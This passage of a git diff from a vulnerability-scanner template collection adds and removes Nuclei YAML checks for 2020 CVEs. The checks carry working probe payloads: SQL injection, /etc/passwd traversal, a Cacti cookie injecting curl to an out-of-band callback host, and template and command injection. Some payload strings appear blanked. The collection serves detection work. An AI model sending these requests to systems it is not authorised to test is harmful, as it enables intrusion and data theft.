13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18. Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7 allow modification of a file download. - reference: - - https://support.citrix.com/article/CTX276688 - - https://nvd.nist.gov/vuln/detail/CVE-2020-8194 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N - cvss-score: 6.5 - cve-id: CVE-2020-8194 - cwe-id: CWE-94 - epss-score: 0.97231 - tags: cve,cve2020,citrix - metadata: - max-request: 1 - -http: - - raw: - - | - GET /menu/guiw?nsbrand=1&protocol=nonexistent.1337">&id=3&nsvpx=phpinfo HTTP/1.1 - Host: {{Hostname}} - Cookie: startupapp=st - - matchers-condition: and - matchers: - - type: word - words: - - "" - part: body - - - type: word - words: - - "application/x-java-jnlp-file" - part: header - - - type: status - status: - - 200 - -# Enhanced by md on 2023/04/04 diff --git a/nuclei-templates/CVE-2020/cve-2020-8209.yaml b/nuclei-templates/CVE-2020/CVE-2020-8209.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-8209.yaml rename to nuclei-templates/CVE-2020/CVE-2020-8209.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-8644.yaml b/nuclei-templates/CVE-2020/CVE-2020-8644.yaml deleted file mode 100644 index 9f91299c9c..0000000000 --- a/nuclei-templates/CVE-2020/CVE-2020-8644.yaml +++ /dev/null @@ -1,58 +0,0 @@ -id: CVE-2020-8644 - -info: - name: playSMS <1.4.3 - Remote Code Execution - author: dbrwsky - severity: critical - description: PlaySMS before version 1.4.3 is susceptible to remote code execution because it double processes a server-side template. - reference: - - https://research.nccgroup.com/2020/02/11/technical-advisory-playsms-pre-authentication-remote-code-execution-cve-2020-8644/ - - https://playsms.org/2020/02/05/playsms-1-4-3-has-been-released/ - - https://nvd.nist.gov/vuln/detail/CVE-2020-8644 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2020-8644 - cwe-id: CWE-74 - tags: cve,cve2020,ssti,playsms,rce,unauth,kev - -requests: - - raw: - - | - GET /index.php?app=main&inc=core_auth&route=login HTTP/1.1 - Host: {{Hostname}} - Origin: {{BaseURL}} - - - | - POST /index.php?app=main&inc=core_auth&route=login&op=login HTTP/1.1 - Host: {{Hostname}} - Origin: {{BaseURL}} - Content-Type: application/x-www-form-urlencoded - - X-CSRF-Token={{csrf}}&username=%7B%7B%60echo%20%27CVE-2020-8644%27%20%7C%20rev%60%7D%7D&password= - - cookie-reuse: true - redirects: true - max-redirects: 2 - extractors: - - type: xpath - name: csrf - part: body - attribute: value - internal: true - xpath: - - /html/body/div[1]/div/div/table/tbody/tr[2]/td/table/tbody/tr/td/form/input - - matchers-condition: and - matchers: - - - type: word - part: body - words: - - '4468-0202-EVC' - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/07/07 diff --git a/nuclei-templates/CVE-2020/CVE-2020-8654.yaml b/nuclei-templates/CVE-2020/CVE-2020-8654.yaml new file mode 100644 index 0000000000..83629c7d1c --- /dev/null +++ b/nuclei-templates/CVE-2020/CVE-2020-8654.yaml @@ -0,0 +1,41 @@ +id: CVE-2020-8654 +info: + name: EyesOfNetwork 5.3 - Authenticated RCE + author: praetorian-thendrickson + severity: high + description: EyesOfNetwork version 5.1-5.3 is vulnerable to multiple exploits. Version 5.3 is vulnerable to CVE-2020-8654 (authenticated rce), CVE-2020-8655 (privesc), CVE-2020-8656 (SQLi - API version before 2.4.2), and 2020-8657 (hardcoded api key). Versions 5.1-5.3 are vulnerable to CVE-2020-9465 (SQLi). + reference: + - https://github.com/h4knet/eonrce + - https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/http/eyesofnetwork_autodiscovery_rce.rb + - https://nvd.nist.gov/vuln/detail/CVE-2020-8657 + - https://github.com/EyesOfNetworkCommunity/eonweb/issues/50 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2020-8654 + cwe-id: CWE-78 + tags: cve,cve2020,cisa,eyesofnetwork,rce,authenticated +requests: + - method: GET + path: + - "{{BaseURL}}/css/eonweb.css" + extractors: + - type: regex + name: version + internal: true + part: body + group: 1 + regex: + - '# VERSION : ([0-9.]+)' + matchers-condition: and + matchers: + - type: dsl + dsl: + - compare_versions(version, '< 5.4', '>= 5.1') + - type: word + part: body + words: + - "EyesOfNetwork" + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2020/CVE-2020-8813.yaml b/nuclei-templates/CVE-2020/CVE-2020-8813.yaml deleted file mode 100644 index 83342323b5..0000000000 --- a/nuclei-templates/CVE-2020/CVE-2020-8813.yaml +++ /dev/null @@ -1,42 +0,0 @@ -id: CVE-2020-8813 - -info: - name: Cacti v1.2.8 - Remote Code Execution - author: gy741 - severity: high - description: Cacti v1.2.8 is susceptible to remote code execution. This vulnerability could be exploited without authentication if "Guest Realtime Graphs" privileges are enabled. - reference: - - https://shells.systems/cacti-v1-2-8-authenticated-remote-code-execution-cve-2020-8813/ - - https://github.com/Cacti/cacti/releases - - https://gist.github.com/mhaskar/ebe6b74c32fd0f7e1eedf1aabfd44129 - - https://drive.google.com/file/d/1A8hxTyk_NgSp04zPX-23nPbsSDeyDFio/view - - https://nvd.nist.gov/vuln/detail/CVE-2020-8813 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H - cvss-score: 8.8 - cve-id: CVE-2020-8813 - cwe-id: CWE-78 - epss-score: 0.96407 - tags: cve,cve2020,cacti,rce,oast - metadata: - max-request: 1 - -http: - - raw: - - | - GET /graph_realtime.php?action=init HTTP/1.1 - Host: {{Hostname}} - Cookie: Cacti=%3Bcurl%20http%3A//{{interactsh-url}} - - matchers: - - type: word - part: interactsh_protocol # Confirms the HTTP Interaction - words: - - "http" - - - type: word - part: interactsh_request - words: - - "User-Agent: curl" - -# Enhanced by mp on 2022/06/27 diff --git a/nuclei-templates/CVE-2020/CVE-2020-9402.yaml b/nuclei-templates/CVE-2020/CVE-2020-9402.yaml new file mode 100644 index 0000000000..4c186f08ef --- /dev/null +++ b/nuclei-templates/CVE-2020/CVE-2020-9402.yaml @@ -0,0 +1,35 @@ +id: CVE-2020-9402 + +info: + name: Django SQL Injection + author: geeknik + severity: high + description: Django 1.11 before 1.11.29, 2.2 before 2.2.11, and 3.0 before 3.0.4 allow SQL injection if untrusted data is used as a tolerance parameter in GIS functions and aggregates on Oracle. By passing a suitably crafted tolerance to GIS functions and aggregates on Oracle, it is possible to break character escaping and inject malicious SQL. + reference: + - https://www.debian.org/security/2020/dsa-4705 + - https://github.com/vulhub/vulhub/tree/master/django/CVE-2020-9402 + - https://docs.djangoproject.com/en/3.0/releases/security/ + - https://nvd.nist.gov/vuln/detail/CVE-2020-9402 + remediation: Upgrade to the latest version. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2020-9402 + cwe-id: CWE-89 + tags: cve,cve2020,django,sqli + +requests: + - method: GET + path: + - "{{BaseURL}}/?q=20)%20%3D%201%20OR%20(select%20utl_inaddr.get_host_name((SELECT%20version%20FROM%20v%24instance))%20from%20dual)%20is%20null%20%20OR%20(1%2B1" + + matchers: + - type: word + words: + - "DatabaseError at" + - "ORA-29257:" + - "ORA-06512:" + - "Request Method:" + condition: and + +# Enhanced by mp on 2022/02/04 diff --git a/nuclei-templates/CVE-2020/cve-2020-9483.yaml b/nuclei-templates/CVE-2020/CVE-2020-9483.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-9483.yaml rename to nuclei-templates/CVE-2020/CVE-2020-9483.yaml diff --git a/nuclei-templates/CVE-2020/cve-2020-9484.yaml b/nuclei-templates/CVE-2020/CVE-2020-9484.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-9484.yaml rename to nuclei-templates/CVE-2020/CVE-2020-9484.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-9496.yaml b/nuclei-templates/CVE-2020/CVE-2020-9496.yaml new file mode 100644 index 0000000000..940129f9e1 --- /dev/null +++ b/nuclei-templates/CVE-2020/CVE-2020-9496.yaml @@ -0,0 +1,45 @@ +id: CVE-2020-9496 + +info: + name: Apache OFBiz XML-RPC Java Deserialization + author: dwisiswant0 + severity: medium + description: XML-RPC request are vulnerable to unsafe deserialization and Cross-Site Scripting issues in Apache OFBiz 17.12.03 + reference: + - http://packetstormsecurity.com/files/158887/Apache-OFBiz-XML-RPC-Java-Deserialization.html + - http://packetstormsecurity.com/files/161769/Apache-OFBiz-XML-RPC-Java-Deserialization.html + - https://securitylab.github.com/advisories/GHSL-2020-069-apache_ofbiz + - https://s.apache.org/l0994 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2020-9496 + cwe-id: CWE-79,CWE-502 + tags: cve,cve2020,apache,java,ofbiz + +requests: + - raw: + - | + POST /webtools/control/xmlrpc HTTP/1.1 + Host: {{Hostname}} + Origin: http://{{Hostname}} + Content-Type: application/xml + + ProjectDiscoverydwisiswant0 + + matchers-condition: and + matchers: + - type: word + words: + - "faultString" + - "No such service [ProjectDiscovery]" + - "methodResponse" + condition: and + part: body + - type: word + words: + - "Content-Type: text/xml" + part: header + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2020/CVE-20200924a.yaml b/nuclei-templates/CVE-2020/CVE-20200924a.yaml new file mode 100644 index 0000000000..7bfd8f9b88 --- /dev/null +++ b/nuclei-templates/CVE-2020/CVE-20200924a.yaml @@ -0,0 +1,33 @@ +id: CVE-20200924a +info: + name: Web requests can navigate outside of DRP controlled areas - Directory traversal + author: c-sh0 + severity: critical + description: Web requests can navigate outside of DRP controlled areas - Directory traversal + reference: + - https://docs.rackn.io/en/latest/doc/security/cve_20200924A.html + - https://docs.rackn.io/en/latest/doc/release.html + - https://registry.hub.docker.com/v1/repositories/digitalrebar/provision/tags + - Affected versions - v4.3.0, v4.3.2, v4.3.3, v4.4.0 (maybe others) + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-20200924a + cwe-id: CWE-22 + tags: cve,cve2020,lfi,rackn,digitalrebar +requests: + - method: GET + path: + - "{{BaseURL}}/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd" + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + part: header + words: + - 'X-Drp-Sha256sum:' + - type: regex + regex: + - "root:.*:0:0" diff --git a/nuclei-templates/CVE-2020/cve-2020-10124.yaml b/nuclei-templates/CVE-2020/cve-2020-10124.yaml deleted file mode 100644 index a8142579c3..0000000000 --- a/nuclei-templates/CVE-2020/cve-2020-10124.yaml +++ /dev/null @@ -1,32 +0,0 @@ -id: CVE-2020-10124 - -info: - name: SolarWindsOrion LFI - author: medbsq - severity: medium -#- https://www.cvebase.com/cve/2019/11043 - -requests: - - method: GET - path: - - "{{BaseURL}}/web.config.i18n.ashx?l=j&v=j" - - "{{BaseURL}}/SWNetPerfMon.db.i18n.ashx?l=j&v=j" - headers: - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 - matchers-condition: and - matchers: - - type: word - words: - - "SolarWinds.Orion.Core.Common." - - "Connection String" - condition: or - part: body - - type: word - words: - - "text/plain" - - "SolarWindsOrionDatabaseUser" - condition: or - part: header - - type: status - status: - - 200 \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/CVE-2020-10148.yaml b/nuclei-templates/CVE-2020/cve-2020-10148.yaml similarity index 100% rename from nuclei-templates/CVE-2020/CVE-2020-10148.yaml rename to nuclei-templates/CVE-2020/cve-2020-10148.yaml diff --git a/nuclei-templates/CVE-2020/cve-2020-10548.yaml b/nuclei-templates/CVE-2020/cve-2020-10548.yaml new file mode 100644 index 0000000000..fb420c8e1b --- /dev/null +++ b/nuclei-templates/CVE-2020/cve-2020-10548.yaml @@ -0,0 +1,29 @@ +id: CVE-2020-10548 +info: + name: rConfig 3.9.4 SQLi + author: madrobot + severity: critical + description: rConfig 3.9.4 and previous versions has unauthenticated devices.inc.php SQL injection. Because, by default, nodes' passwords are stored in cleartext, this vulnerability leads to lateral movement, granting an attacker access to monitored network devices. + reference: + - https://github.com/theguly/exploits/blob/master/CVE-2020-10548.py + - https://theguly.github.io/2020/09/rconfig-3.9.4-multiple-vulnerabilities/ + tags: cve,cve2020,rconfig,sqli + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-10548 + cwe-id: CWE-89,CWE-522 + +requests: + - method: GET + path: + - "{{BaseURL}}/devices.inc.php?search=True&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL+--+&searchColumn=n.id&searchOption=contains" + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "[project-discovery]" + part: body diff --git a/nuclei-templates/CVE-2020/cve-2020-10549.yaml b/nuclei-templates/CVE-2020/cve-2020-10549.yaml new file mode 100644 index 0000000000..9a05c1f547 --- /dev/null +++ b/nuclei-templates/CVE-2020/cve-2020-10549.yaml @@ -0,0 +1,29 @@ +id: CVE-2020-10549 +info: + name: rConfig 3.9.4 SQLi + author: madrobot + severity: critical + description: rConfig 3.9.4 and previous versions has unauthenticated snippets.inc.php SQL injection. Because, by default, nodes' passwords are stored in cleartext, this vulnerability leads to lateral movement, granting an attacker access to monitored network devices. + reference: + - https://github.com/theguly/exploits/blob/master/CVE-2020-10549.py + - https://theguly.github.io/2020/09/rconfig-3.9.4-multiple-vulnerabilities/ + tags: cve,cve2020,rconfig,sqli + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-10549 + cwe-id: CWE-89,CWE-522 + +requests: + - method: GET + path: + - "{{BaseURL}}/snippets.inc.php?search=True&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL,NULL+--+&searchColumn=snippetName&searchOption=contains" + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "[project-discovery]" + part: body diff --git a/nuclei-templates/CVE-2020/cve-2020-10770.yaml b/nuclei-templates/CVE-2020/cve-2020-10770.yaml new file mode 100644 index 0000000000..756813b008 --- /dev/null +++ b/nuclei-templates/CVE-2020/cve-2020-10770.yaml @@ -0,0 +1,28 @@ +id: CVE-2020-10770 + +info: + name: Keycloak 12.0.1 - 'request_uri ' Blind Server-Side Request Forgery (SSRF) (Unauthenticated) + author: dhiyaneshDk + severity: medium + description: A flaw was found in Keycloak before 13.0.0, where it is possible to force the server to call out an unverified URL using the OIDC parameter request_uri. This flaw allows an attacker to use this parameter to execute a Server-side request forgery (SSRF) attack. + reference: + - https://packetstormsecurity.com/files/164499/Keycloak-12.0.1-Server-Side-Request-Forgery.html + - https://www.exploit-db.com/exploits/50405 + - https://nvd.nist.gov/vuln/detail/CVE-2020-10770 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N + cvss-score: 5.30 + cve-id: CVE-2020-10770 + cwe-id: CWE-601 + tags: keycloak,ssrf,oast,cve,cve2020,blind + +requests: + - method: GET + path: + - '{{BaseURL}}/auth/realms/master/protocol/openid-connect/auth?scope=openid&response_type=code&redirect_uri=valid&state=cfx&nonce=cfx&client_id=security-admin-console&request_uri=http://{{interactsh-url}}/' + + matchers: + - type: word + part: interactsh_protocol # Confirms the HTTP Interaction + words: + - "http" diff --git a/nuclei-templates/CVE-2020/cve-2020-11110.yaml b/nuclei-templates/CVE-2020/cve-2020-11110.yaml deleted file mode 100644 index da0bf70b6c..0000000000 --- a/nuclei-templates/CVE-2020/cve-2020-11110.yaml +++ /dev/null @@ -1,53 +0,0 @@ -id: CVE-2020-11110 - -info: - author: emadshanab - severity: medium - name: Grafana Unauthenticated Stored XSS - description: Grafana through 6.7.1 allows stored XSS due to insufficient input protection in the originalUrl field, which allows an attacker to inject JavaScript code that will be executed after clicking on Open Original Dashboard after visiting the snapshot. - tags: cve,cve2020,xss,grafana - reference: - - https://ctf-writeup.revers3c.com/challenges/web/CVE-2020-11110/index.html - - https://nvd.nist.gov/vuln/detail/CVE-2020-11110 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 - cve-id: CVE-2020-11110 - cwe-id: CWE-79 -requests: - - raw: - - | - POST /api/snapshots HTTP/1.1 - Host: {{Hostname}} - Accept: application/json, text/plain, */* - Accept-Language: en-US,en;q=0.5 - Referer: {{BaseURL}} - content-type: application/json - Connection: close - - {"dashboard":{"annotations":{"list":[{"name":"Annotations & Alerts","enable":true,"iconColor":"rgba(0, 211, 255, 1)","type":"dashboard","builtIn":1,"hide":true}]},"editable":true,"gnetId":null,"graphTooltip":0,"id":null,"links":[],"panels":[],"schemaVersion":18,"snapshot":{"originalUrl":"javascript:alert('Revers3c')","timestamp":"2020-03-30T01:24:44.529Z"},"style":"dark","tags":[],"templating":{"list":[]},"time":{"from":null,"to":"2020-03-30T01:24:53.549Z","raw":{"from":"6h","to":"now"}},"timepicker":{"refresh_intervals":["5s","10s","30s","1m","5m","15m","30m","1h","2h","1d"],"time_options":["5m","15m","1h","6h","12h","24h","2d","7d","30d"]},"timezone":"","title":"Dashboard","uid":null,"version":0},"name":"Dashboard","expires":0} - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - part: header - words: - - application/json - - - type: word - part: body - words: - - '"deleteKey":' - - '"deleteUrl":' - condition: and - - extractors: - - type: regex - part: body - group: 1 - regex: - - '"url":"([a-z:/0-9A-Z]+)"' diff --git a/nuclei-templates/CVE-2020/cve-2020-11455.yaml b/nuclei-templates/CVE-2020/cve-2020-11455.yaml deleted file mode 100644 index 99abf2cac1..0000000000 --- a/nuclei-templates/CVE-2020/cve-2020-11455.yaml +++ /dev/null @@ -1,32 +0,0 @@ -id: CVE-2020-11455 - -info: - name: LimeSurvey 4.1.11 - Path Traversal - author: daffainfo - severity: medium - description: LimeSurvey before 4.1.12+200324 contains a path traversal vulnerability in application/controllers/admin/LimeSurveyFileManager.php. - reference: - - https://www.exploit-db.com/exploits/48297 - - https://www.cvedetails.com/cve/CVE-2020-11455 - tags: cve,cve2020,lfi - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.30 - cve-id: CVE-2020-11455 - cwe-id: CWE-22 - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php/admin/filemanager/sa/getZipFile?path=/../../../../../../../etc/passwd" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0" - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2020/CVE-2020-11854.yaml b/nuclei-templates/CVE-2020/cve-2020-11854.yaml similarity index 100% rename from nuclei-templates/CVE-2020/CVE-2020-11854.yaml rename to nuclei-templates/CVE-2020/cve-2020-11854.yaml diff --git a/nuclei-templates/CVE-2020/cve-2020-11978.yaml b/nuclei-templates/CVE-2020/cve-2020-11978.yaml deleted file mode 100644 index e5ec23bd48..0000000000 --- a/nuclei-templates/CVE-2020/cve-2020-11978.yaml +++ /dev/null @@ -1,60 +0,0 @@ -id: CVE-2020-11978 -info: - name: Apache Airflow <= 1.10.10 - 'Example Dag' Remote Code Execution - author: pdteam - severity: high - description: An issue was found in Apache Airflow versions 1.10.10 and below. A remote code/command injection vulnerability was discovered in one of the example DAGs shipped with Airflow which would allow any authenticated user to run arbitrary commands as the user running airflow worker/scheduler (depending on the executor in use). If you already have examples disabled by setting load_examples=False in the config then you are not vulnerable. - reference: - - https://github.com/pberba/CVE-2020-11978 - - https://nvd.nist.gov/vuln/detail/CVE-2020-11978 - - https://twitter.com/wugeej/status/1400336603604668418 - tags: cve,cve2020,apache,airflow,rce - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H - cvss-score: 8.80 - cve-id: CVE-2020-11978 - cwe-id: CWE-77 - -requests: - - raw: - - | - GET /api/experimental/test HTTP/1.1 - Host: {{Hostname}} - Accept: */* - - - | - GET /api/experimental/dags/example_trigger_target_dag/paused/false HTTP/1.1 - Host: {{Hostname}} - Accept: */* - - - | - POST /api/experimental/dags/example_trigger_target_dag/dag_runs HTTP/1.1 - Host: {{Hostname}} - Accept: */* - Content-Type: application/json - - {"conf": {"message": "\"; touch test #"}} - - - | - GET /api/experimental/dags/example_trigger_target_dag/dag_runs/{{exec_date}}/tasks/bash_task HTTP/1.1 - Host: {{Hostname}} - Accept: */* - - - extractors: - - type: regex - name: exec_date - part: body - group: 1 - internal: true - regex: - - '"execution_date":"([0-9-A-Z:+]+)"' - - req-condition: true - matchers-condition: and - matchers: - - type: dsl - dsl: - - 'contains(body_4, "operator":"BashOperator")' - - 'contains(all_headers_4, "application/json")' - condition: and \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/cve-2020-12259.yaml b/nuclei-templates/CVE-2020/cve-2020-12259.yaml new file mode 100644 index 0000000000..3026e1ed61 --- /dev/null +++ b/nuclei-templates/CVE-2020/cve-2020-12259.yaml @@ -0,0 +1,54 @@ +id: CVE-2020-12259 + +info: + name: rConfig 3.9.4 - Cross-Site Scripting + author: r3Y3r53 + severity: medium + description: | + rConfig 3.9.4 is vulnerable to reflected XSS. The configDevice.php file improperly validates user input. An attacker can exploit this vulnerability by crafting arbitrary JavaScript in the rid GET parameter of devicemgmnt.php + reference: + - https://www.rconfig.com/downloads/rconfig-3.9.4.zip + - https://gist.github.com/farid007/8855031bad0e497264e4879efb5bc9f8 + - https://nvd.nist.gov/vuln/detail/CVE-2020-12259 + - https://github.com/ARPSyndicate/kenzer-templates + - https://github.com/Elsfa7-110/kenzer-templates + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2020-12259 + cwe-id: CWE-79 + epss-score: 0.16256 + epss-percentile: 0.95859 + cpe: cpe:2.3:a:rconfig:rconfig:3.9.4:*:*:*:*:*:*:* + metadata: + verified: "true" + max-request: 3 + vendor: rconfig + product: rconfig + shodan-query: http.title:"rConfig" + tags: cve2020,cve,rconfig,authenticated,xss + +http: + - raw: + - | + GET /login.php HTTP/1.1 + Host: {{Hostname}} + - | + POST /lib/crud/userprocess.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + user={{username}}&pass={{password}}&sublogin=1 + - | + GET /configDevice.php?rid="> HTTP/1.1 + Host: {{Hostname}} + + host-redirects: true + matchers: + - type: dsl + dsl: + - 'status_code_3 == 200' + - 'contains(body_3, "") && contains(body_3, "rConfig - Configuration Management")' + - 'contains(content_type_3, "text/html")' + condition: and +# digest: 4a0a004730450221008538b08ecf8b93aacaac1be17c9980fbd0271e09e3a6e8cc79cfa36012a6d45d02203407d4ecb1e8ce517abd06804bf82b38a837a545c09169a361bbf6dc879e332a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/CVE-2020-12271.yaml b/nuclei-templates/CVE-2020/cve-2020-12271.yaml similarity index 100% rename from nuclei-templates/CVE-2020/CVE-2020-12271.yaml rename to nuclei-templates/CVE-2020/cve-2020-12271.yaml diff --git a/nuclei-templates/CVE-2020/cve-2020-13121.yaml b/nuclei-templates/CVE-2020/cve-2020-13121.yaml new file mode 100644 index 0000000000..cd7764f649 --- /dev/null +++ b/nuclei-templates/CVE-2020/cve-2020-13121.yaml @@ -0,0 +1,46 @@ +id: CVE-2020-13121 + +info: + name: Submitty <= 20.04.01 - Open Redirect + author: 0x_Akoko + severity: medium + description: Submitty through 20.04.01 contains an open redirect vulnerability via authentication/login?old= during an invalid login attempt. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks. + remediation: | + Upgrade to Submitty version 20.04.01 or later to fix the open redirect vulnerability. + reference: + - https://github.com/Submitty/Submitty/issues/5265 + - https://nvd.nist.gov/vuln/detail/CVE-2020-13121 + - https://github.com/ARPSyndicate/kenzer-templates + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2020-13121 + cwe-id: CWE-601 + epss-score: 0.00235 + epss-percentile: 0.60944 + cpe: cpe:2.3:a:rcos:submitty:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: rcos + product: submitty + tags: cve,cve2020,redirect,submitty,oos,rcos + +http: + - raw: + - | + POST /authentication/check_login?old=http%253A%252F%252Fexample.com%252Fhome HTTP/1.1 + Host: {{Hostname}} + Origin: {{RootURL}} + Content-Type: application/x-www-form-urlencoded + Referer: {{RootURL}}/authentication/login + + user_id={{username}}&password={{password}}&stay_logged_in=on&login=Login + + matchers: + - type: regex + part: header + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 +# digest: 4a0a0047304502206f176277eec35ef135b67c205d1cdacbf6a6d6a914b0330fc921447e4d77f10a022100d548e0e86bb67accdbea62a2cb11ff6fdfd956cb47edb0909e50b0bb2324b033:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/cve-2020-13158.yaml b/nuclei-templates/CVE-2020/cve-2020-13158.yaml new file mode 100644 index 0000000000..eabc15c664 --- /dev/null +++ b/nuclei-templates/CVE-2020/cve-2020-13158.yaml @@ -0,0 +1,31 @@ +id: CVE-2020-13158 +info: + name: Artica Proxy before 4.30.000000 Community Edition - Directory Traversal + author: 0x_Akoko + severity: high + description: Artica Proxy before 4.30.000000 Community Edition allows Directory Traversal via the fw.progrss.details.php popup parameter. + reference: + - https://github.com/InfoSec4Fun/CVE-2020-13158 + - https://sourceforge.net/projects/artica-squid/files/ + - https://nvd.nist.gov/vuln/detail/CVE-2020-13158 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2020-13158 + cwe-id: CWE-22 + tags: cve,cve2020,artica,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/fw.progrss.details.php?popup=..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd" + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2020/cve-2020-13927.yaml b/nuclei-templates/CVE-2020/cve-2020-13927.yaml deleted file mode 100644 index b9095c970e..0000000000 --- a/nuclei-templates/CVE-2020/cve-2020-13927.yaml +++ /dev/null @@ -1,28 +0,0 @@ -id: CVE-2020-13927 - -info: - name: Unauthenticated Airflow Experimental REST API - author: pdteam - severity: critical - tags: cve,cve2020,apache,airflow,unauth - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 - cve-id: CVE-2020-13927 - description: "The previous default setting for Airflow's Experimental API was to allow all API requests without authentication, but this poses security risks to users who miss this fact. From Airflow 1.10.11 the default has been changed to deny all requests by default and is documented at https://airflow.apache.org/docs/1.10.11/security.html#api-authentication. Note this change fixes it for new installs but existing users need to change their config to default `[api]auth_backend = airflow.api.auth.backend.deny_all` as mentioned in the Updating Guide: https://github.com/apache/airflow/blob/1.10.11/UPDATING.md#experimental-api-will-deny-all-request-by-default" - reference: - - https://lists.apache.org/thread.html/r23a81b247aa346ff193670be565b2b8ea4b17ddbc7a35fc099c1aadd%40%3Cdev.airflow.apache.org%3E - - http://packetstormsecurity.com/files/162908/Apache-Airflow-1.10.10-Remote-Code-Execution.html - -requests: - - method: GET - path: - - '{{BaseURL}}/api/experimental/latest_runs' - - matchers: - - type: word - words: - - '"dag_run_url":' - - '"dag_id":' - - '"items":' - condition: and diff --git a/nuclei-templates/CVE-2020/cve-2020-13942.yaml b/nuclei-templates/CVE-2020/cve-2020-13942.yaml deleted file mode 100644 index 45757b968d..0000000000 --- a/nuclei-templates/CVE-2020/cve-2020-13942.yaml +++ /dev/null @@ -1,65 +0,0 @@ -id: CVE-2020-13942 - -info: - name: Apache Unomi Remote Code Execution - author: dwisiswant0 - severity: critical - description: | - Remote Code Execution in Apache Unomi. - Apache Unomi allows conditions to use OGNL and MVEL scripting which - offers the possibility to call static Java classes from the JDK - that could execute code with the permission level of the running Java process. - This vulnerability affects all versions of Apache Unomi prior to 1.5.2. Apache Unomi users should upgrade to 1.5.2 or later. - - reference: - - https://securityboulevard.com/2020/11/apache-unomi-cve-2020-13942-rce-vulnerabilities-discovered/ - - https://twitter.com/chybeta/status/1328912309440311297 - tags: cve,cve2020,apache,rce - classification: - cvss-metrics: 